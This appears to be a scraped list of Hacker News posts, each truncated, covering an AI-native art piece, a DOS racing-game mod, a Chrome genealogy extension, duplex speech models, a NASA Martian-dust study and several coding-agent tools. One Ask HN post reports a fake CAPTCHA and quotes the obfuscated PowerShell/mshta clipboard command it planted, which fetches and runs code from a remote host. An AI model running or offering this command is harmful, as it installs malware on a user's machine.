Show HN: Christopher Nolan's Hymn to Athenahttps://jackcushman.org/writing/hymn-to-athena/Hi, HN! Did you know that Chris Nolan's casting of Tom Holland and Zendaya eerily echoes a 3000-year-old dance battle between Athena and Telemachus? I've been working on an art project that says so.If you like, it can be fun to go in blind with a strong research agent to sort out what this really is. Or there is a multi-layered CAPTCHA at the bottom that spells it out increasingly clearly. As a small spoiler: my day job is building reliable public data tools for a library. This piece draws on that background to try to make AI-native art -- fiction by and for humans who use AI agents as a source of truth. At best I hope it works as the kind of joke one Iain M. Banks Culture AI would tell another about humans.

Show HN: A mod for Grand Prix Circuit (DSI/Accolade, 1988)https://marnetto.net/projects/grand-prix-circuitHello HN,I have built a mod for Grand Prix Circuit, an old 2.5D racing game: the latest episode of a long series of community efforts to reverse-engineer and improve the games made by Distinctive Software (today's EA Vancouver) in the DOS era.I've been dabbling in hacking old DOS games for almost two years, but this time I think my project is big enough to be worthy of a “Show HN“.From the gaming point of view, the mod offers a variety of new cars and tracks, from Spa to the Space, and more sophisticated EGA backgrounds than the original game. From the technical point of view, it was an interesting effort combining reverse engineering, development, design and pixel art, all of which both in classic and LLM-assisted variants. From the literary point of view, I have documented the making of the game in a series of (fully human-written) posts [1]. There is something for everyone: war stories, hacking techniques, the word “boustrophedonic” and, as bonus, an outdoor game to keep your kids awa

Ask HN: Crooked Timber showed showed me a virus captcha, What now?https://news.ycombinator.com/item?id=49084404Hello everyone, This morning, as i started my shift, i thought i would start visiting some news blogs / websites to kick off the day. When it got to Crooked Timber i saw a captcha page instead, it looked like a traditional Google captcha. I clicked it, the spinner spun, and a box opened on the right, showing the traditional "Verify you're human" white title on a blue background. It showed 2 "Manual Verification Steps" : 1. Press Win + R 2. Press Ctrl + V and press RunAt first i assumed it was a new type of captcha checking i a physical keyboard was attached to the browser. But i instantly recognized the attempt to make me run a script on my machine.I opened a new type and to my surprise, the something new was in my clipboard : "pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi""I submited it to one of LLMs my work gives me access to, which told me to absolutly not run it (i wasn't planning to) and explained the command would download and

Show HN: Shoebox Plus Organizer – search, sort, and filter your Ancestry Shoeboxhttps://chromewebstore.google.com/detail/shoebox-plus-organizer/ncmfpkikgbnacbiipnbnfdohjpbgjjkhAs a genealogist for nearly two decades, including a stint as a Research Manager for Ancestry's research arm, AncestryProGenealogists, I have heard colleagues and clients alike complain about the "Shoebox," an Ancestry record bookmarking tool, lacking a mechanism to search, sort, and filter content. Once you've saved a few hundred documents, you must endure an endless paginated scroll, 25 records at a time.My solution: Shoebox Plus Organizer — a Manifest V3 Chrome extension that loads every page of your Shoebox in the background, then provides live full-text search, date sorting, and record-type filtering, all client-side over the DOM that's already rendered on the page.Everything runs on-device. No servers, no external API calls, no analytics. There's nowhere for the data to go. It doesn't scrape or automate faster than a human clicking through pages. Shoebox Plus Organizer reformats what's already loaded. Works across all 11 international Ancestry sites (.com, .co.uk, .ca, .com.au, .

Show HN: Production duplex speech model for revenue callshttps://metavoice.io/Hi, HN, we’re building Mia & Leo: AI personalities backed by purpose-built duplex speech models for revenue calls.Teams building real-world agents told us that more than 40% of callers hang up within the first 30 seconds. On a revenue call, that meant a lost booking, an unpaid balance, a cold lead, or a customer who does not come back. This happens because humans interrupt, correct dates, pause halfway through a sentence, or speak over someone in the background. The agent misses it, talks over them, or loses the thread. That’s because of how the current voice systems work. They sequentially listen, stop, think, and then speak. The conversation is actually a walkie-talkie exchange. So, we’re proud to introduce our first iteration of Mia & Leo who keep listening while they speak. They can handle interruptions, overlapping speech, corrections, and background voices without breaking the conversation. They are also built for production. Developers get control over agent behaviour, visibility in

Establishing Crew Exposure Limits of Martian Dusthttps://www.nasa.gov/general/establishing-crew-exposure-limits-of-martian-dust/Background Human exploration of Mars will expose crews to a persistent, fine particulate environment whose physicochemical properties and health implications remain only partly understood. Because no samples of authentic Martian airborne dust have been returned to Earth, NASA must rely on lunar dust toxicology, Martian regolith simulants, and extensive rover/lander geochemical and mineralogical datasets to […]

Show HN: Pokayoke – turn code conventions into checks for agentshttps://pokayoke.codesHey HN,Something I've been tinkering with in the background is a system to manage the "messy-middle" of TypeScript toolchains. Quite often, when I'm using Biome or any of the other linter / formatters, there will be repo conventions that I want to enforce (especially with AI agents), but which aren't supported by them, such as:- Enforcing lines-of-code limits in modules - Never using custom TailWind colors - Only using lowercase underscores in filenamesLike, this is quite "random" but also bread-and-butter stuff that it's easy to think or talk about when you're working by yourself or with a few other human teammates, but I've found that agents consistently miss these conventions if I put them in an AGENTS.md file for example.I wanted to make my esoteric repo conventions less stochastic, and more deterministic. I realised that agents are adept at writing the kind of code needed to run arbitrary checks on the TypeScript AST or workspace environment -- the kind of code that is cumbersome

Show HN: Sipp – Run small local LLMs in browser 3x fasterhttps://www.sipp.shHi HN! Sipp is an open-source AI inference library for running local models in browsers with up to 3x faster decode speeds than alternative libraries. My background is in HCI (human-computer interaction) and graphics programming. Me along with my co-founder have been experimenting and thinking a lot about what the next user experience will look like when tokens are commodified to the point of being essentially “free.” A motivation for us was to try to move beyond the chat app and information retrieval use cases that are dominant now, and figure out how AI could instead act as a continuous and silent hand that helps the user indirectly, subtly monitoring their intent and dynamically generating or shifting the UI to meet their needs. In our explorations, we ran into two pain points: 1) when running AI in the browser, performance wasn’t good enough for real-time applications, and model loading and caching were issues; 2) when trying to run locally on desktop, there weren’t any good solution

Show HN: Babysit – let coding agents operate a TUIhttps://github.com/yusukeshib/babysitI've been trying to automate my work recently, but I ofeten encounter the situation where agents needs human intervention to complete the task. So I made a simple command that wraps a TUI called babysit that has a terminal emulator inside using pty. Agents can start commands in background, and they can ask human by attaching the TUI on a new tmux pane when human intervention is needed, or they can operate the TUI with screenshot/send/expect/wait commands. So far, I really like using it, and I wanted to share it here.https://github.com/yusukeshib/babysit

Show HN: An Agent First Slack CLIhttps://github.com/tilework-tech/nori-slack-cliHey folks,My team and I have been building a background agents as a service product. One of the things we needed pretty early on was for some way for the agents to be able to drive slack.Right now, I don't think there are many good agent-first ways of doing this. I don't love MCP -- it's just too many tokens in the context window, and agents seem to do better with CLIs because they can embed them in code and so on. But other CLIs that exist are either a) subsets of the web api that only focus on human needs and b) have polished terminal UIs with spinners and colors and interactive things that make it hard for LLMs to actually use them.nori-slack-cli is a very thin dynamic wrapper over @slack/web-api (i.e. bolt). Whatever the SDK can call, the CLI can call. When slack adds a new method it should just work without a new release on our end. (Inspired by the GWS cli: https://github.com/googleworkspace/cli).So you(r agent) can do things like:`nori-slack chat.postMessage --channel C123 --tex
